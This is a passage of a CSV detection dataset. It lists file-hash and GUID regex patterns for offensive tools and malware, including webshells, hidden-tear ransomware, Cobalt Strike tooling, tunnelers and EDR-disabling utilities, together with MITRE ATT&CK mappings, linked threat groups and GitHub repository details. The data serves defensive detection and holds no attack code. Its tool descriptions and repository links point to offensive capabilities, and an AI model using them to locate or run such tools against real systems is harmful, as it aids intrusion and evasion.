#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21210" "*07d01f86a1a030d45d8fb8b372cfd986b8f3a7d530046f16acc5e82082e53ec6*",".{0,1000}07d01f86a1a030d45d8fb8b372cfd986b8f3a7d530046f16acc5e82082e53ec6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21213" "*07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581*",".{0,1000}07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21214" "*07d8d02d79b1653fdb0f1c91a56d62f7f1a418564874605e07755a1f9f010b61*",".{0,1000}07d8d02d79b1653fdb0f1c91a56d62f7f1a418564874605e07755a1f9f010b61.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21215" "*07dd043bc4e5ef2651ac9a1b4e5b849ce2e3dd6e3ca593a48625b568cfff924b*",".{0,1000}07dd043bc4e5ef2651ac9a1b4e5b849ce2e3dd6e3ca593a48625b568cfff924b.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - 
TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21216" "*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*",".{0,1000}07DFC5AA\-5B1F\-4CCC\-A3D3\-816ECCBB6CB6.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","#GUIDproject","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","21217" "*07e05292767dac077c0314535d073a90f742f25456880b2bf5311c4cf8169b91*",".{0,1000}07e05292767dac077c0314535d073a90f742f25456880b2bf5311c4cf8169b91.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21218" "*07e5db0b397c217cb4d5bcee82d68065beecf390f30f223aeb857f231ca1e5fd*",".{0,1000}07e5db0b397c217cb4d5bcee82d68065beecf390f30f223aeb857f231ca1e5fd.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21220" "*07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956*",".{0,1000}07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21221" "*07ec4fa926a9f4a90971f5bf78948fe4da7c6c4fc7c30d155d3c69c86258dcac*",".{0,1000}07ec4fa926a9f4a90971f5bf78948fe4da7c6c4fc7c30d155d3c69c86258dcac.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21223" "*07EF7652-1C2D-478B-BB4B-F9560695A387*",".{0,1000}07EF7652\-1C2D\-478B\-BB4B\-F9560695A387.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21224" 
"*07f1a35a2a86c46c5b0f70176aaacd6268b3dbf639d77bcf1b89235e8b44f327*",".{0,1000}07f1a35a2a86c46c5b0f70176aaacd6268b3dbf639d77bcf1b89235e8b44f327.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","21226" "*07f9947795d25159d1df8ef1a6fcef3f17f96b659f31137a6f48eeaa061d3731*",".{0,1000}07f9947795d25159d1df8ef1a6fcef3f17f96b659f31137a6f48eeaa061d3731.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21229" "*07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac*",".{0,1000}07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21230" "*0800C357553BD74B42A5DD8A7C80C59422BFBC23F3E3F81CF0B16DEF66D4A70F*",".{0,1000}0800C357553BD74B42A5DD8A7C80C59422BFBC23F3E3F81CF0B16DEF66D4A70F.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy 
usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21231" "*08023b564648a07a5a37d7b4668f60616aeb3766a34be65130d722f46b9dd7aa*",".{0,1000}08023b564648a07a5a37d7b4668f60616aeb3766a34be65130d722f46b9dd7aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21232" "*080A880D-BA94-4CF8-9015-5B2063073E02*",".{0,1000}080A880D\-BA94\-4CF8\-9015\-5B2063073E02.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#GUIDproject","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","21234" "*080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1*",".{0,1000}080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21235" "*080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5*",".{0,1000}080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","#filehash","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","21236" "*080de56a40e4ff15b0157da0224988a36f3e7c2347d58824ab3880f338d3eaec*",".{0,1000}080de56a40e4ff15b0157da0224988a36f3e7c2347d58824ab3880f338d3eaec.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/pwn1sher/WMEye","1","0","#filehash","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","21237" "*08114a94779a336824a0c62c3d19622fb39aae355962d36a97ba1423a4d6bfcf*",".{0,1000}08114a94779a336824a0c62c3d19622fb39aae355962d36a97ba1423a4d6bfcf.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#filehash","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","21238" "*0817eb1eeb9b25430a2666b8bd637d83e8c3c10ba14a8f6db0b0d3147ce3ab4a*",".{0,1000}0817eb1eeb9b25430a2666b8bd637d83e8c3c10ba14a8f6db0b0d3147ce3ab4a.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21241" "*0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9*",".{0,1000}0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21242" "*081a942df7cb4e74d01caf742178772aa5ec00905a6e546c5d80b5a495612bdf*",".{0,1000}081a942df7cb4e74d01caf742178772aa5ec00905a6e546c5d80b5a495612bdf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21243" "*082d22b44f305420b9ac577066effac3f01db0431671bef3667b6388082683b6*",".{0,1000}082d22b44f305420b9ac577066effac3f01db0431671bef3667b6388082683b6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21249" "*082f932faefd33a4e3500c5cb8e119e09d5f914de6d18f16162b48bba15bb7d4*",".{0,1000}082f932faefd33a4e3500c5cb8e119e09d5f914de6d18f16162b48bba15bb7d4.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21250" "*08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157*",".{0,1000}08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21251" "*08390cf5db68b7171650673f4214c9eee385d94c302c202a7de39d9fe0182796*",".{0,1000}08390cf5db68b7171650673f4214c9eee385d94c302c202a7de39d9fe0182796.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21253" "*083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf*",".{0,1000}083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21254" "*083dbfe9fbd1a94c640aa2e80c0304ac49d337b15f6f148c2f91d2c21a23cbb6*",".{0,1000}083dbfe9fbd1a94c640aa2e80c0304ac49d337b15f6f148c2f91d2c21a23cbb6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21256" "*08422736c3ebf5b528cc404a39a20c8975d49758854115ee979ebff49282f5d9*",".{0,1000}08422736c3ebf5b528cc404a39a20c8975d49758854115ee979ebff49282f5d9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21257" "*0845B3E9-B6AE-4227-B484-CECBC2EB1C87*",".{0,1000}0845B3E9\-B6AE\-4227\-B484\-CECBC2EB1C87.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21258" "*0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1*",".{0,1000}0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21263" "*0866f16193a1944b2208ac9d22d3f629113eb968adcb8872b2659ec749c6f31a*",".{0,1000}0866f16193a1944b2208ac9d22d3f629113eb968adcb8872b2659ec749c6f31a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21266" "*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*",".{0,1000}086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21268" 
"*086e623f343e09d81210818bf6d295f7eb12143e787d168973e16e29ea3a5942*",".{0,1000}086e623f343e09d81210818bf6d295f7eb12143e787d168973e16e29ea3a5942.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21269" "*086e7df92c7c6845243c26170b58c1bc173f79da123275abdf5ea07eb59c90a1*",".{0,1000}086e7df92c7c6845243c26170b58c1bc173f79da123275abdf5ea07eb59c90a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21270" "*087c26613e0a27bccb09de333278fb55c2b9cf3cf7600e36615353e67c1baaf9*",".{0,1000}087c26613e0a27bccb09de333278fb55c2b9cf3cf7600e36615353e67c1baaf9.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21273" "*087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd*",".{0,1000}087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - 
Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21275" "*08809731dc3d878c71e0c6bfc5d27a78912aa67483533570da7bc475d22bd0ab*",".{0,1000}08809731dc3d878c71e0c6bfc5d27a78912aa67483533570da7bc475d22bd0ab.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21276" "*088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4*",".{0,1000}088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21277" "*08854cc16c9fa4e9c61fccf8ae992e2645e59cb7e0c45d399775208f4aae60d5*",".{0,1000}08854cc16c9fa4e9c61fccf8ae992e2645e59cb7e0c45d399775208f4aae60d5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21278" "*0888fa2d4be29e8820db387ceacaf7fb7a43e10d4e897ea0e7308674727584de*",".{0,1000}0888fa2d4be29e8820db387ceacaf7fb7a43e10d4e897ea0e7308674727584de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21279" "*08896ffbae54cce89cdd8a4158ba8273a4d15c47f87cd8467c778a4000e0b152*",".{0,1000}08896ffbae54cce89cdd8a4158ba8273a4d15c47f87cd8467c778a4000e0b152.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","21280" "*089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a*",".{0,1000}089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21281" "*089CA7D6-3277-4998-86AF-F6413290A442*",".{0,1000}089CA7D6\-3277\-4998\-86AF\-F6413290A442.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#GUIDproject","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","21282" "*089dd9652baa70862d00f465c81a5df3ab7129e82dca73edea36d0cfd8152b89*",".{0,1000}089dd9652baa70862d00f465c81a5df3ab7129e82dca73edea36d0cfd8152b89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21283" "*089e1f51fe8751dfbbc11c8ffd8d7b6121ac025d8e0c0c2f082e3d976d6af948*",".{0,1000}089e1f51fe8751dfbbc11c8ffd8d7b6121ac025d8e0c0c2f082e3d976d6af948.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation 